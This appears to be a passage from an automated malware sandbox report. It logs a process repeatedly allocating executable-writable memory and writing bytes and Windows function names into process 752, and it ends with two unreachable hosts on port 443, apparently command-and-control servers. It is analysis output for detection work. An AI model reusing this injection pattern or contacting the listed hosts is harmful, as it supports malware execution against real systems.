buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: GetLastError
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: HeapFree
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: HeapSize
base_address: 0x0000000000260000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

WriteProcessMemory

buffer: 6æväv&
base_address: 0x0000000000270000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

WriteProcessMemory

buffer:  ,ëv +æv€/æv Ùävð@wÀ/!w0!ww'
base_address: 0x00000000000a0000
process_identifier: 752
process_handle: 0x0000000000000408
1 1 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0
dead_host 79.106.115.107:443
dead_host 194.146.249.137:443